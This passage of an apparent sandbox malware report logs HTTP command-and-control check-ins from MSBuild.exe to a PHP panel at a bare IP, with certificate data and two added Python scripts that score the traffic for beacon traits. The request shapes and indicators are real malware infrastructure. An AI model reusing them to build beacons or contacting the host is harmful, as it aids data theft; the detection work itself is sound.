  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
  Content-Type: application/x-www-form-urlencoded
  Host: 64.188.18.218
  Content-Length: 368
  Expect: 100-continue
  Connection: Keep-Alive
Jan 13, 2021 13:44:59.074533939 CET | 3086 | IN | HTTP/1.1 100 Continue
Jan 13, 2021 13:44:59.209170103 CET | 3087 | IN | HTTP/1.1 200 OK
  Date: Wed, 13 Jan 2021 12:44:59 GMT
  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
  X-Powered-By: PHP/7.2.34
  Content-Length: 0
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
Jan 13, 2021 13:44:59.486521959 CET | 3087 | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
  Content-Type: application/x-www-form-urlencoded
  Host: 64.188.18.218
  Content-Length: 368
  Expect: 100-continue
Jan 13, 2021 13:44:59.609003067 CET | 3087 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.739639044 CET3088INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.815963984 CET3088OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.938215971 CET3088INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.075582981 CET3089INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.189289093 CET3090OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.314462900 CET3091INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.453552008 CET3091INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.530474901 CET3092OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.653135061 CET3092INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.786899090 CET3093INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.049076080 CET3094OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.171358109 CET3095INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.401803017 CET3095INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:01 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.534459114 CET3096OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.657144070 CET3098INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.791830063 CET3099INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:01 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.309396029 CET3100OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.431840897 CET3100INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.561350107 CET3101INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.773190975 CET3102OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.896239996 CET3102INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.030250072 CET3102INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.275532007 CET3107OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.397965908 CET3108INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.527234077 CET3114INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:03 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
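The exchanges above are what an AgentTesla-style panel check-in looks like on the wire: the same PHP endpoint on 64.188.18.218, a fixed 368-byte form-encoded body every few hundred milliseconds, a Firefox User-Agent sent by a process that is not a browser (the session header records MSBuild.exe), and empty 200 replies. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the form the report's text export uses (the Timestamp, kBytes, Direction and Data columns run together, e.g. `CET3087OUTPOST ...`, and also a ` | ` separated layout) and scores the session with those beacon heuristics. The sample rows are copied from the traffic above, trimmed to the headers the analysis needs; the sending process is taken from the Session 2 header and the thresholds are assumptions chosen for illustration.

```python
"""Structure the flattened Joe Sandbox HTTP rows and score an endpoint for
panel-beacon behaviour (added example; not part of the sandbox report)."""
import re
from datetime import datetime, timezone
from statistics import mean

# Rows copied from the 64.188.18.218:80 traffic in the report, in the export's
# fused column layout; headers of the later exchanges trimmed to what is analysed.
SAMPLE_ROWS = """\
Jan 13, 2021 13:44:59.486521959 CET3087OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 64.188.18.218
Content-Length: 368
Expect: 100-continue
Jan 13, 2021 13:44:59.609003067 CET3087INHTTP/1.1 100 Continue
Jan 13, 2021 13:44:59.739639044 CET3088INHTTP/1.1 200 OK
Content-Length: 0
Jan 13, 2021 13:44:59.815963984 CET3088OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
Host: 64.188.18.218
Content-Length: 368
Jan 13, 2021 13:45:00.075582981 CET3089INHTTP/1.1 200 OK
Content-Length: 0
Jan 13, 2021 13:45:00.189289093 CET3090OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
Host: 64.188.18.218
Content-Length: 368
Jan 13, 2021 13:45:00.453552008 CET3091INHTTP/1.1 200 OK
Content-Length: 0
Jan 13, 2021 13:45:00.530474901 CET3092OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
Host: 64.188.18.218
Content-Length: 368
Jan 13, 2021 13:45:00.786899090 CET3093INHTTP/1.1 200 OK
Content-Length: 0
"""

# Accepts the fused layout ("CET3087OUTPOST ...") and a " | " separated layout.
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) [A-Z]{3,4}"
    r"(?: \| )?(?P<kb>\d+)(?: kB)?(?: \| )?(?P<dir>IN|OUT) *(?:\| )?(?P<data>\S.*)$"
)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def parse_ts(ts: str) -> float:
    """Epoch seconds from 'Jan 13, 2021 13:44:59.486521959'. strptime's %f takes
    at most 6 digits, so the 9-digit fraction is added by hand; zone pinned to
    UTC because only deltas between rows are used."""
    head, frac = ts.rsplit(".", 1)
    base = datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return base.timestamp() + int(frac.ljust(9, "0")[:9]) / 1e9


def parse_rows(text: str) -> list:
    """Each timestamped row opens a message; the 'Name: value' lines after it
    are its headers (names lower-cased)."""
    messages = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            messages.append({"ts": parse_ts(m["ts"]), "dir": m["dir"],
                             "line": m["data"].strip(), "headers": {}})
        elif messages and ": " in line:
            name, value = line.strip().split(": ", 1)
            messages[-1]["headers"][name.lower()] = value
    return messages


def analyze_beacons(text: str, process: str) -> dict:
    """Heuristic score of the OUT requests of one session. The flags are
    indicators of beacon-like traffic, not proof of C2; thresholds are assumed."""
    msgs = parse_rows(text)
    posts = [m for m in msgs if m["dir"] == "OUT" and m["line"].startswith("POST ")]
    oks = [m for m in msgs if m["dir"] == "IN" and m["line"].startswith("HTTP/1.1 200")]
    if len(posts) < 2:
        return {"count": len(posts), "flags": []}
    times = sorted(m["ts"] for m in posts)
    gaps = [b - a for a, b in zip(times, times[1:])]
    paths = {m["line"].split(" ")[1] for m in posts}
    lengths = {m["headers"].get("content-length") for m in posts}
    uas = {m["headers"]["user-agent"] for m in posts if "user-agent" in m["headers"]}
    flags = []
    if len(paths) == 1 and len(lengths) == 1:
        flags.append("fixed_size_posts_single_endpoint")
    if mean(gaps) < 5.0:                      # check-ins seconds apart
        flags.append("short_interval")
    if max(gaps) - min(gaps) < mean(gaps):    # spread smaller than the period
        flags.append("low_jitter")
    if any("Mozilla/" in ua for ua in uas) and process.lower().rsplit("\\", 1)[-1] not in BROWSERS:
        flags.append("browser_ua_from_non_browser_process")
    if oks and all(r["headers"].get("content-length") == "0" for r in oks):
        flags.append("empty_200_replies")
    return {"count": len(posts), "paths": paths, "content_lengths": lengths,
            "mean_interval_s": mean(gaps), "flags": flags}


if __name__ == "__main__":
    # Sending process as recorded in the Session 2 header of the report.
    proc = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    for key, value in analyze_beacons(SAMPLE_ROWS, proc).items():
        print(f"{key}: {value}")
```

On the four sampled POSTs the mean interval comes out just under 0.35 s and all five flags fire. The process check is the one that matters most in a hunt: a Firefox User-Agent is unremarkable from firefox.exe and highly suspicious from MSBuild.exe, which is why the function takes the process path from the session header rather than inferring it from the traffic.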


Session ID | Source IP    | Source Port | Destination IP | Destination Port | Process
2          | 192.168.2.22 | 49198       | 64.188.18.218  | 80               | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:44:59.973675013 CET | 3089 kB | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
Jan 13, 2021 13:45:00.095396042 CET | 3090 kB | IN  | HTTP/1.1 100 Continue
Jan 13, 2021 13:45:00.227030039 CET | 3090 kB | IN  | HTTP/1.1 200 OK
    Date: Wed, 13 Jan 2021 12:45:00 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
    X-Powered-By: PHP/7.2.34
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8
Jan 13, 2021 13:45:00.655978918 CET | 3092 kB | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.781065941 CET3093INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.912853003 CET3094INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.999212027 CET3099OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.121244907 CET3099INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.262056112 CET3100INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49201 | 64.188.18.218 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:45:03.601350069 CET | 3115 | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
Jan 13, 2021 13:45:03.724831104 CET | 3130 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49217 | 64.188.18.218 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 13:45:51.948399067 CET | 4685 | OUT | POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
    Connection: Keep-Alive
Jan 13, 2021 13:45:52.072664022 CET | 4685 | IN | HTTP/1.1 100 Continue
Jan 13, 2021 13:45:52.202646017 CET | 4686 | IN | HTTP/1.1 200 OK
    Date: Wed, 13 Jan 2021 12:45:52 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
    X-Powered-By: PHP/7.2.34
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
Jan 13, 2021 13:45:52.559609890 CET | 4686 | IN | HTTP/1.1 200 OK
    Date: Wed, 13 Jan 2021 12:45:52 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
    X-Powered-By: PHP/7.2.34
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
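The sessions above all carry the same request shape: a POST from MSBuild.exe to a hex-named PHP script under /webpanel-st/inc/ on a bare-IP host, a fixed 368-byte form-encoded body, a Firefox User-Agent paired with `Expect: 100-continue` (a header browsers do not send but the .NET HttpWebRequest stack adds by default), and a 200 OK with an empty body in reply. The report does not show the POST bodies, so everything below works on the headers only. The following block is an added example, not part of the Joe Sandbox report: it transcribes one request/response pair from the table as constructed sample input, parses the HTTP head and names the traits a detection rule would key on; the indicator names, the path regex and the three-beacon minimum in `beacon_sizes_constant` are this example's own choices.

```python
"""Header-level indicator checks over the HTTP C2 exchange recorded above.

Added illustration; not code from the Joe Sandbox report. REQUEST and RESPONSE
are transcribed from the report's session table. Indicator names, the path
pattern and the beacon threshold are assumptions made for this example.
"""
import re
from ipaddress import ip_address

# Transcribed from the report (every session shows the same request head).
REQUEST = (
    "POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 64.188.18.218\r\n"
    "Content-Length: 368\r\n"
    "Expect: 100-continue\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 13 Jan 2021 12:45:00 GMT\r\n"
    "Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34\r\n"
    "X-Powered-By: PHP/7.2.34\r\n"
    "Content-Length: 0\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)


def parse_message(raw):
    """Split a raw HTTP/1.1 head into (start line, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_bare_ip(host):
    """True when the Host header is a literal IP address rather than a name."""
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def indicators(request_raw, response_raw=None):
    """Return the names of the C2 traits present in one request/response pair."""
    start, req = parse_message(request_raw)
    method, path, _ = start.split(" ", 2)
    found = []
    ua = req.get("user-agent", "")
    # Browsers never send Expect: 100-continue; .NET HttpWebRequest does by
    # default, so a browser UA plus this header is a self-contradicting client.
    if "100-continue" in req.get("expect", "").lower() and ua.startswith("Mozilla/"):
        found.append("browser_ua_with_expect_100_continue")
    if is_bare_ip(req.get("host", "")):
        found.append("host_is_bare_ip")
    # Panel drop script: POST to a hex-named .php file under an inc/ directory.
    if method == "POST" and re.search(r"/inc/[0-9a-f]{8,}\.php$", path):
        found.append("post_to_hex_named_php_under_inc")
    if "webpanel" in path.lower():
        found.append("webpanel_path")
    if response_raw is not None:
        rstart, resp = parse_message(response_raw)
        # The panel acknowledges with 200 OK and no body at all.
        if rstart.startswith("HTTP/1.1 200") and resp.get("content-length") == "0":
            found.append("empty_200_ack")
    return found


def beacon_sizes_constant(content_lengths):
    """True when at least three POSTs carried the identical Content-Length."""
    return len(content_lengths) >= 3 and len(set(content_lengths)) == 1


if __name__ == "__main__":
    print(indicators(REQUEST, RESPONSE))
    # Content-Length values of the POSTs listed in the report's sessions.
    print(beacon_sizes_constant([368, 368, 368, 368, 368]))
```

Any single trait above also appears in benign traffic (plenty of legitimate .NET tools send `Expect: 100-continue`); the combination, repeated at the same body size from a process such as MSBuild.exe that has no business posting forms, is what makes the rule worth alerting on.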


                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206911087 CET108.177.127.132443192.168.2.2249168CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194725037 CET104.18.49.20443192.168.2.2249174CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.917670965 CET108.177.127.132443192.168.2.2249178CN=misc-sni.blogspot.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Dec 15 15:45:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue Mar 09 15:45:08 CET 2021 Wed Dec 15 01:00:42 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.395072937 CET104.18.49.20443192.168.2.2249183CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.158859015 CET104.18.49.20443192.168.2.2249184CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
